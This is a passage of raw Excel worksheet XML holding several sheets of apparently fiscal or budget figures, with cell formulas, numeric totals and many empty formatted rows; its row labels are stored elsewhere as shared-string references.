    <col min="13558" max="13558" width="43" style="2" customWidth="1"/>
    <col min="13559" max="13812" width="10" style="2"/>
    <col min="13813" max="13813" width="50.42578125" style="2" customWidth="1"/>
    <col min="13814" max="13814" width="43" style="2" customWidth="1"/>
    <col min="13815" max="14068" width="10" style="2"/>
    <col min="14069" max="14069" width="50.42578125" style="2" customWidth="1"/>
    <col min="14070" max="14070" width="43" style="2" customWidth="1"/>
    <col min="14071" max="14324" width="10" style="2"/>
    <col min="14325" max="14325" width="50.42578125" style="2" customWidth="1"/>
    <col min="14326" max="14326" width="43" style="2" customWidth="1"/>
    <col min="14327" max="14580" width="10" style="2"/>
    <col min="14581" max="14581" width="50.42578125" style="2" customWidth="1"/>
    <col min="14582" max="14582" width="43" style="2" customWidth="1"/>
    <col min="14583" max="14836" width="10" style="2"/>
    <col min="14837" max="14837" width="50.42578125" style="2" customWidth="1"/>
    <col min="14838" max="14838" width="43" style="2" customWidth="1"/>
    <col min="14839" max="15092" width="10" style="2"/>
    <col min="15093" max="15093" width="50.42578125" style="2" customWidth="1"/>
    <col min="15094" max="15094" width="43" style="2" customWidth="1"/>
    <col min="15095" max="15348" width="10" style="2"/>
    <col min="15349" max="15349" width="50.42578125" style="2" customWidth="1"/>
    <col min="15350" max="15350" width="43" style="2" customWidth="1"/>
    <col min="15351" max="15604" width="10" style="2"/>
    <col min="15605" max="15605" width="50.42578125" style="2" customWidth="1"/>
    <col min="15606" max="15606" width="43" style="2" customWidth="1"/>
    <col min="15607" max="15860" width="10" style="2"/>
    <col min="15861" max="15861" width="50.42578125" style="2" customWidth="1"/>
    <col min="15862" max="15862" width="43" style="2" customWidth="1"/>
    <col min="15863" max="16116" width="10" style="2"/>
    <col min="16117" max="16117" width="50.42578125" style="2" customWidth="1"/>
    <col min="16118" max="16118" width="43" style="2" customWidth="1"/>
    <col min="16119" max="16374" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:4" s="2" customFormat="1" ht="18" customHeight="1">
      <c r="A1" s="91" t="s">
        <v>1050</v>
      </c>
      <c r="B1" s="94"/>
    </row>
    <row r="2" spans="1:4" s="2" customFormat="1" ht="33.950000000000003" customHeight="1">
      <c r="A2" s="745" t="s">
        <v>1051</v>
      </c>
      <c r="B2" s="746"/>
    </row>
    <row r="3" spans="1:4" s="2" customFormat="1" ht="21.95" customHeight="1">
      <c r="A3" s="747" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="747"/>
    </row>
    <row r="4" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A4" s="121" t="s">
        <v>344</v>
      </c>
      <c r="B4" s="121" t="s">
        <v>957</v>
      </c>
    </row>
    <row r="5" spans="1:4" s="1" customFormat="1" ht="27.95" customHeight="1">
      <c r="A5" s="122" t="s">
        <v>1052</v>
      </c>
      <c r="B5" s="97">
        <f>B6+B7</f>
        <v>842742</v>
      </c>
    </row>
    <row r="6" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A6" s="123" t="s">
        <v>1053</v>
      </c>
      <c r="B6" s="101">
        <v>296147</v>
      </c>
    </row>
    <row r="7" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A7" s="123" t="s">
        <v>1054</v>
      </c>
      <c r="B7" s="101">
        <v>546595</v>
      </c>
    </row>
    <row r="8" spans="1:4" s="1" customFormat="1" ht="27.95" customHeight="1">
      <c r="A8" s="122" t="s">
        <v>1055</v>
      </c>
      <c r="B8" s="97">
        <f>B9+B14</f>
        <v>204310</v>
      </c>
    </row>
    <row r="9" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A9" s="123" t="s">
        <v>1056</v>
      </c>
      <c r="B9" s="99">
        <f>SUM(B10:B13)</f>
        <v>204310</v>
      </c>
    </row>
    <row r="10" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A10" s="123" t="s">
        <v>1057</v>
      </c>
      <c r="B10" s="101"/>
    </row>
    <row r="11" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A11" s="123" t="s">
        <v>1058</v>
      </c>
      <c r="B11" s="101">
        <v>13960</v>
      </c>
    </row>
    <row r="12" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A12" s="123" t="s">
        <v>1059</v>
      </c>
      <c r="B12" s="101">
        <v>147000</v>
      </c>
    </row>
    <row r="13" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A13" s="123" t="s">
        <v>1060</v>
      </c>
      <c r="B13" s="101">
        <v>43350</v>
      </c>
    </row>
    <row r="14" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A14" s="123" t="s">
        <v>1061</v>
      </c>
      <c r="B14" s="101"/>
    </row>
    <row r="15" spans="1:4" s="1" customFormat="1" ht="27.95" customHeight="1">
      <c r="A15" s="124" t="s">
        <v>1062</v>
      </c>
      <c r="B15" s="103">
        <f>B16+B18</f>
        <v>59600</v>
      </c>
      <c r="D15" s="125"/>
    </row>
    <row r="16" spans="1:4" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A16" s="123" t="s">
        <v>1063</v>
      </c>
      <c r="B16" s="101">
        <v>14300</v>
      </c>
    </row>
    <row r="17" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A17" s="126" t="s">
        <v>1064</v>
      </c>
      <c r="B17" s="101"/>
    </row>
    <row r="18" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A18" s="123" t="s">
        <v>1065</v>
      </c>
      <c r="B18" s="101">
        <v>45300</v>
      </c>
    </row>
    <row r="19" spans="1:2" s="1" customFormat="1" ht="27.95" customHeight="1">
      <c r="A19" s="124" t="s">
        <v>1066</v>
      </c>
      <c r="B19" s="97">
        <f>B20+B22</f>
        <v>31234</v>
      </c>
    </row>
    <row r="20" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A20" s="123" t="s">
        <v>1067</v>
      </c>
      <c r="B20" s="101">
        <v>9486</v>
      </c>
    </row>
    <row r="21" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A21" s="126" t="s">
        <v>1068</v>
      </c>
      <c r="B21" s="101"/>
    </row>
    <row r="22" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A22" s="123" t="s">
        <v>1069</v>
      </c>
      <c r="B22" s="101">
        <v>21748</v>
      </c>
    </row>
    <row r="23" spans="1:2" s="1" customFormat="1" ht="27.95" customHeight="1">
      <c r="A23" s="124" t="s">
        <v>1070</v>
      </c>
      <c r="B23" s="103">
        <f>SUM(B24:B25)</f>
        <v>987452</v>
      </c>
    </row>
    <row r="24" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A24" s="126" t="s">
        <v>1053</v>
      </c>
      <c r="B24" s="101">
        <f>B6+B10+B11-B16</f>
        <v>295807</v>
      </c>
    </row>
    <row r="25" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A25" s="123" t="s">
        <v>1071</v>
      </c>
      <c r="B25" s="99">
        <f>B7+B12+B13-B18</f>
        <v>691645</v>
      </c>
    </row>
    <row r="26" spans="1:2" s="1" customFormat="1" ht="27.95" customHeight="1">
      <c r="A26" s="127" t="s">
        <v>1072</v>
      </c>
      <c r="B26" s="128">
        <f>SUM(B27:B28)</f>
        <v>1009000</v>
      </c>
    </row>
    <row r="27" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A27" s="129" t="s">
        <v>1053</v>
      </c>
      <c r="B27" s="130">
        <v>315400</v>
      </c>
    </row>
    <row r="28" spans="1:2" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A28" s="129" t="s">
        <v>1071</v>
      </c>
      <c r="B28" s="130">
        <v>693600</v>
      </c>
    </row>
    <row r="29" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A29" s="104"/>
      <c r="B29" s="106"/>
    </row>
    <row r="30" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A30" s="104"/>
      <c r="B30" s="106"/>
    </row>
    <row r="31" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A31" s="104"/>
      <c r="B31" s="106"/>
    </row>
    <row r="32" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A32" s="104"/>
      <c r="B32" s="106"/>
    </row>
    <row r="33" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A33" s="104"/>
      <c r="B33" s="106"/>
    </row>
    <row r="34" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A34" s="104"/>
      <c r="B34" s="106"/>
    </row>
    <row r="35" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A35" s="104"/>
      <c r="B35" s="106"/>
    </row>
    <row r="36" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A36" s="104"/>
      <c r="B36" s="106"/>
    </row>
    <row r="37" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A37" s="104"/>
      <c r="B37" s="106"/>
    </row>
    <row r="38" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A38" s="104"/>
      <c r="B38" s="106"/>
    </row>
    <row r="39" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A39" s="104"/>
      <c r="B39" s="106"/>
    </row>
    <row r="40" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A40" s="104"/>
      <c r="B40" s="106"/>
    </row>
    <row r="41" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A41" s="104"/>
      <c r="B41" s="106"/>
    </row>
    <row r="42" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A42" s="104"/>
      <c r="B42" s="106"/>
    </row>
    <row r="43" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A43" s="104"/>
      <c r="B43" s="106"/>
    </row>
    <row r="44" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A44" s="104"/>
      <c r="B44" s="106"/>
    </row>
    <row r="45" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A45" s="104"/>
      <c r="B45" s="106"/>
    </row>
    <row r="46" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A46" s="104"/>
    </row>
    <row r="47" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A47" s="104"/>
    </row>
    <row r="48" spans="1:2" s="2" customFormat="1" ht="14.25">
      <c r="A48" s="104"/>
    </row>
    <row r="49" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A49" s="104"/>
    </row>
    <row r="50" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A50" s="104"/>
    </row>
    <row r="51" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A51" s="104"/>
    </row>
    <row r="52" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A52" s="104"/>
    </row>
    <row r="53" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A53" s="104"/>
    </row>
    <row r="54" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A54" s="104"/>
    </row>
    <row r="55" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A55" s="104"/>
    </row>
    <row r="56" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A56" s="104"/>
    </row>
    <row r="57" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A57" s="104"/>
    </row>
    <row r="58" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A58" s="104"/>
    </row>
    <row r="59" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A59" s="104"/>
    </row>
    <row r="60" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A60" s="104"/>
    </row>
    <row r="61" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A61" s="104"/>
    </row>
    <row r="62" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A62" s="104"/>
    </row>
    <row r="63" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A63" s="104"/>
    </row>
    <row r="64" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A64" s="104"/>
    </row>
    <row r="65" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A65" s="104"/>
    </row>
    <row r="66" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A66" s="104"/>
    </row>
    <row r="67" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A67" s="104"/>
    </row>
    <row r="68" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A68" s="104"/>
    </row>
    <row r="69" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A69" s="104"/>
    </row>
    <row r="70" spans="1:1" s="2" customFormat="1" ht="14.25">
      <c r="A70" s="104"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.156944444444444" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>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45"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E4" sqref="E4:G4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="16.28515625" style="2" customWidth="1"/>
    <col min="2" max="6" width="12.7109375" style="2" customWidth="1"/>
    <col min="7" max="7" width="15.140625" style="2" customWidth="1"/>
    <col min="8" max="16376" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7" s="2" customFormat="1" ht="18" customHeight="1">
      <c r="A1" s="38" t="s">
        <v>1073</v>
      </c>
      <c r="B1" s="90"/>
      <c r="C1" s="90"/>
      <c r="D1" s="90"/>
      <c r="E1" s="90"/>
      <c r="F1" s="90"/>
      <c r="G1" s="117"/>
    </row>
    <row r="2" spans="1:7" s="2" customFormat="1" ht="28.15" customHeight="1">
      <c r="A2" s="748" t="s">
        <v>1074</v>
      </c>
      <c r="B2" s="748"/>
      <c r="C2" s="748"/>
      <c r="D2" s="748"/>
      <c r="E2" s="748"/>
      <c r="F2" s="748"/>
      <c r="G2" s="748"/>
    </row>
    <row r="3" spans="1:7" s="2" customFormat="1" ht="27.95" customHeight="1">
      <c r="A3" s="118"/>
      <c r="B3" s="118"/>
      <c r="C3" s="118"/>
      <c r="D3" s="118"/>
      <c r="E3" s="118"/>
      <c r="F3" s="118"/>
      <c r="G3" s="40" t="s">
        <v>270</v>
      </c>
    </row>
    <row r="4" spans="1:7" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A4" s="752" t="s">
        <v>1075</v>
      </c>
      <c r="B4" s="749" t="s">
        <v>1076</v>
      </c>
      <c r="C4" s="750"/>
      <c r="D4" s="751"/>
      <c r="E4" s="749" t="s">
        <v>1077</v>
      </c>
      <c r="F4" s="750"/>
      <c r="G4" s="751"/>
    </row>
    <row r="5" spans="1:7" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A5" s="753"/>
      <c r="B5" s="119" t="s">
        <v>383</v>
      </c>
      <c r="C5" s="119" t="s">
        <v>1078</v>
      </c>
      <c r="D5" s="119" t="s">
        <v>1079</v>
      </c>
      <c r="E5" s="119" t="s">
        <v>383</v>
      </c>
      <c r="F5" s="119" t="s">
        <v>1078</v>
      </c>
      <c r="G5" s="119" t="s">
        <v>1079</v>
      </c>
    </row>
    <row r="6" spans="1:7" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A6" s="61" t="s">
        <v>1080</v>
      </c>
      <c r="B6" s="63">
        <f t="shared" ref="B6" si="0">SUM(C6:D6)</f>
        <v>1009000</v>
      </c>
      <c r="C6" s="63">
        <v>315400</v>
      </c>
      <c r="D6" s="63">
        <v>693600</v>
      </c>
      <c r="E6" s="64">
        <f t="shared" ref="E6" si="1">SUM(F6:G6)</f>
        <v>987452</v>
      </c>
      <c r="F6" s="63">
        <v>295807</v>
      </c>
      <c r="G6" s="63">
        <v>691645</v>
      </c>
    </row>
    <row r="7" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A7" s="44"/>
      <c r="B7" s="44"/>
      <c r="C7" s="44"/>
      <c r="D7" s="44"/>
      <c r="E7" s="44"/>
      <c r="F7" s="44"/>
      <c r="G7" s="120"/>
    </row>
    <row r="8" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A8" s="44"/>
      <c r="B8" s="44"/>
      <c r="C8" s="44"/>
      <c r="D8" s="44"/>
      <c r="E8" s="44"/>
      <c r="F8" s="44"/>
      <c r="G8" s="120"/>
    </row>
    <row r="9" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A9" s="44"/>
      <c r="B9" s="44"/>
      <c r="C9" s="44"/>
      <c r="D9" s="44"/>
      <c r="E9" s="44"/>
      <c r="F9" s="44"/>
      <c r="G9" s="120"/>
    </row>
    <row r="10" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A10" s="44"/>
      <c r="B10" s="44"/>
      <c r="C10" s="44"/>
      <c r="D10" s="44"/>
      <c r="E10" s="44"/>
      <c r="F10" s="44"/>
      <c r="G10" s="120"/>
    </row>
    <row r="11" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A11" s="44"/>
      <c r="B11" s="44"/>
      <c r="C11" s="44"/>
      <c r="D11" s="44"/>
      <c r="E11" s="44"/>
      <c r="F11" s="44"/>
      <c r="G11" s="120"/>
    </row>
    <row r="12" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A12" s="44"/>
      <c r="B12" s="44"/>
      <c r="C12" s="44"/>
      <c r="D12" s="44"/>
      <c r="E12" s="44"/>
      <c r="F12" s="44"/>
      <c r="G12" s="120"/>
    </row>
    <row r="13" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A13" s="44"/>
      <c r="B13" s="44"/>
      <c r="C13" s="44"/>
      <c r="D13" s="44"/>
      <c r="E13" s="44"/>
      <c r="F13" s="44"/>
      <c r="G13" s="120"/>
    </row>
    <row r="14" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A14" s="44"/>
      <c r="B14" s="44"/>
      <c r="C14" s="44"/>
      <c r="D14" s="44"/>
      <c r="E14" s="44"/>
      <c r="F14" s="44"/>
      <c r="G14" s="120"/>
    </row>
    <row r="15" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A15" s="44"/>
      <c r="B15" s="44"/>
      <c r="C15" s="44"/>
      <c r="D15" s="44"/>
      <c r="E15" s="44"/>
      <c r="F15" s="44"/>
      <c r="G15" s="120"/>
    </row>
    <row r="16" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A16" s="44"/>
      <c r="B16" s="44"/>
      <c r="C16" s="44"/>
      <c r="D16" s="44"/>
      <c r="E16" s="44"/>
      <c r="F16" s="44"/>
      <c r="G16" s="120"/>
    </row>
    <row r="17" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A17" s="44"/>
      <c r="B17" s="44"/>
      <c r="C17" s="44"/>
      <c r="D17" s="44"/>
      <c r="E17" s="44"/>
      <c r="F17" s="44"/>
      <c r="G17" s="120"/>
    </row>
    <row r="18" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A18" s="44"/>
      <c r="B18" s="44"/>
      <c r="C18" s="44"/>
      <c r="D18" s="44"/>
      <c r="E18" s="44"/>
      <c r="F18" s="44"/>
      <c r="G18" s="120"/>
    </row>
    <row r="19" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A19" s="44"/>
      <c r="B19" s="44"/>
      <c r="C19" s="44"/>
      <c r="D19" s="44"/>
      <c r="E19" s="44"/>
      <c r="F19" s="44"/>
      <c r="G19" s="120"/>
    </row>
    <row r="20" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A20" s="44"/>
      <c r="B20" s="44"/>
      <c r="C20" s="44"/>
      <c r="D20" s="44"/>
      <c r="E20" s="44"/>
      <c r="F20" s="44"/>
      <c r="G20" s="120"/>
    </row>
    <row r="21" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A21" s="44"/>
      <c r="B21" s="44"/>
      <c r="C21" s="44"/>
      <c r="D21" s="44"/>
      <c r="E21" s="44"/>
      <c r="F21" s="44"/>
      <c r="G21" s="120"/>
    </row>
    <row r="22" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A22" s="44"/>
      <c r="B22" s="44"/>
      <c r="C22" s="44"/>
      <c r="D22" s="44"/>
      <c r="E22" s="44"/>
      <c r="F22" s="44"/>
      <c r="G22" s="120"/>
    </row>
    <row r="23" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A23" s="44"/>
      <c r="B23" s="44"/>
      <c r="C23" s="44"/>
      <c r="D23" s="44"/>
      <c r="E23" s="44"/>
      <c r="F23" s="44"/>
      <c r="G23" s="120"/>
    </row>
    <row r="24" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="A24" s="44"/>
      <c r="B24" s="44"/>
      <c r="C24" s="44"/>
      <c r="D24" s="44"/>
      <c r="E24" s="44"/>
      <c r="F24" s="44"/>
      <c r="G24" s="120"/>
    </row>
    <row r="25" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G25" s="120"/>
    </row>
    <row r="26" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G26" s="120"/>
    </row>
    <row r="27" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G27" s="120"/>
    </row>
    <row r="28" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G28" s="120"/>
    </row>
    <row r="29" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G29" s="120"/>
    </row>
    <row r="30" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G30" s="120"/>
    </row>
    <row r="31" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G31" s="120"/>
    </row>
    <row r="32" spans="1:7" s="2" customFormat="1" ht="14.25">
      <c r="G32" s="120"/>
    </row>
    <row r="33" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G33" s="120"/>
    </row>
    <row r="34" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G34" s="120"/>
    </row>
    <row r="35" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G35" s="120"/>
    </row>
    <row r="36" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G36" s="120"/>
    </row>
    <row r="37" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G37" s="120"/>
    </row>
    <row r="38" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G38" s="120"/>
    </row>
    <row r="39" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G39" s="120"/>
    </row>
    <row r="40" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G40" s="120"/>
    </row>
    <row r="41" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G41" s="120"/>
    </row>
    <row r="42" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G42" s="120"/>
    </row>
    <row r="43" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G43" s="120"/>
    </row>
    <row r="44" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G44" s="120"/>
    </row>
    <row r="45" spans="7:7" s="2" customFormat="1" ht="14.25">
      <c r="G45" s="120"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:G2"/>
    <mergeCell ref="B4:D4"/>
    <mergeCell ref="E4:G4"/>
    <mergeCell ref="A4:A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47"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G10" sqref="G10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="16" style="2" customWidth="1"/>
    <col min="2" max="8" width="11.28515625" style="2" customWidth="1"/>
    <col min="9" max="16363" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:8" s="2" customFormat="1" ht="18" customHeight="1">
      <c r="A1" s="38" t="s">
        <v>1081</v>
      </c>
      <c r="B1" s="59"/>
      <c r="C1" s="59"/>
      <c r="D1" s="59"/>
      <c r="E1" s="59"/>
      <c r="F1" s="59"/>
      <c r="G1" s="59"/>
      <c r="H1" s="59"/>
    </row>
    <row r="2" spans="1:8" s="2" customFormat="1" ht="28.15" customHeight="1">
      <c r="A2" s="748" t="s">
        <v>1082</v>
      </c>
      <c r="B2" s="748"/>
      <c r="C2" s="748"/>
      <c r="D2" s="748"/>
      <c r="E2" s="748"/>
      <c r="F2" s="748"/>
      <c r="G2" s="748"/>
      <c r="H2" s="748"/>
    </row>
    <row r="3" spans="1:8" s="2" customFormat="1" ht="24" customHeight="1">
      <c r="A3" s="754" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="754"/>
      <c r="C3" s="754"/>
      <c r="D3" s="754"/>
      <c r="E3" s="754"/>
      <c r="F3" s="754"/>
      <c r="G3" s="754"/>
      <c r="H3" s="754"/>
    </row>
    <row r="4" spans="1:8" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A4" s="756" t="s">
        <v>1075</v>
      </c>
      <c r="B4" s="755" t="s">
        <v>383</v>
      </c>
      <c r="C4" s="755" t="s">
        <v>1083</v>
      </c>
      <c r="D4" s="755"/>
      <c r="E4" s="755"/>
      <c r="F4" s="755" t="s">
        <v>1084</v>
      </c>
      <c r="G4" s="755"/>
      <c r="H4" s="755"/>
    </row>
    <row r="5" spans="1:8" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A5" s="756"/>
      <c r="B5" s="755"/>
      <c r="C5" s="60" t="s">
        <v>1085</v>
      </c>
      <c r="D5" s="60" t="s">
        <v>1086</v>
      </c>
      <c r="E5" s="60" t="s">
        <v>1087</v>
      </c>
      <c r="F5" s="60" t="s">
        <v>1085</v>
      </c>
      <c r="G5" s="60" t="s">
        <v>1088</v>
      </c>
      <c r="H5" s="60" t="s">
        <v>1089</v>
      </c>
    </row>
    <row r="6" spans="1:8" s="2" customFormat="1" ht="36" customHeight="1">
      <c r="A6" s="61" t="s">
        <v>1080</v>
      </c>
      <c r="B6" s="62">
        <f t="shared" ref="B6" si="0">C6+F6</f>
        <v>204310</v>
      </c>
      <c r="C6" s="62">
        <f t="shared" ref="C6" si="1">D6+E6</f>
        <v>13960</v>
      </c>
      <c r="D6" s="62"/>
      <c r="E6" s="63">
        <v>13960</v>
      </c>
      <c r="F6" s="64">
        <f t="shared" ref="F6" si="2">G6+H6</f>
        <v>190350</v>
      </c>
      <c r="G6" s="64">
        <v>147000</v>
      </c>
      <c r="H6" s="64">
        <v>43350</v>
      </c>
    </row>
    <row r="7" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A7" s="44"/>
      <c r="B7" s="65"/>
      <c r="C7" s="65"/>
      <c r="D7" s="65"/>
      <c r="E7" s="65"/>
      <c r="F7" s="65"/>
      <c r="G7" s="65"/>
      <c r="H7" s="65"/>
    </row>
    <row r="8" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A8" s="44"/>
      <c r="B8" s="65"/>
      <c r="C8" s="65"/>
      <c r="D8" s="65"/>
      <c r="E8" s="65"/>
      <c r="F8" s="65"/>
      <c r="G8" s="65"/>
      <c r="H8" s="65"/>
    </row>
    <row r="9" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A9" s="44"/>
      <c r="B9" s="65"/>
      <c r="C9" s="65"/>
      <c r="D9" s="65"/>
      <c r="E9" s="65"/>
      <c r="F9" s="65"/>
      <c r="G9" s="65"/>
      <c r="H9" s="65"/>
    </row>
    <row r="10" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A10" s="44"/>
      <c r="B10" s="65"/>
      <c r="C10" s="65"/>
      <c r="D10" s="65"/>
      <c r="E10" s="65"/>
      <c r="F10" s="65"/>
      <c r="G10" s="65"/>
      <c r="H10" s="65"/>
    </row>
    <row r="11" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A11" s="44"/>
      <c r="B11" s="65"/>
      <c r="C11" s="65"/>
      <c r="D11" s="65"/>
      <c r="E11" s="65"/>
      <c r="F11" s="65"/>
      <c r="G11" s="65"/>
      <c r="H11" s="65"/>
    </row>
    <row r="12" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A12" s="44"/>
      <c r="B12" s="65"/>
      <c r="C12" s="65"/>
      <c r="D12" s="65"/>
      <c r="E12" s="65"/>
      <c r="F12" s="65"/>
      <c r="G12" s="65"/>
      <c r="H12" s="65"/>
    </row>
    <row r="13" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A13" s="44"/>
      <c r="B13" s="65"/>
      <c r="C13" s="65"/>
      <c r="D13" s="65"/>
      <c r="E13" s="65"/>
      <c r="F13" s="65"/>
      <c r="G13" s="65"/>
      <c r="H13" s="65"/>
    </row>
    <row r="14" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A14" s="44"/>
      <c r="B14" s="65"/>
      <c r="C14" s="65"/>
      <c r="D14" s="65"/>
      <c r="E14" s="65"/>
      <c r="F14" s="65"/>
      <c r="G14" s="65"/>
      <c r="H14" s="65"/>
    </row>
    <row r="15" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A15" s="44"/>
      <c r="B15" s="65"/>
      <c r="C15" s="65"/>
      <c r="D15" s="65"/>
      <c r="E15" s="65"/>
      <c r="F15" s="65"/>
      <c r="G15" s="65"/>
      <c r="H15" s="65"/>
    </row>
    <row r="16" spans="1:8" s="2" customFormat="1" ht="14.25">
      <c r="A16" s="44"/>
      <c r="B16" s="65"/>
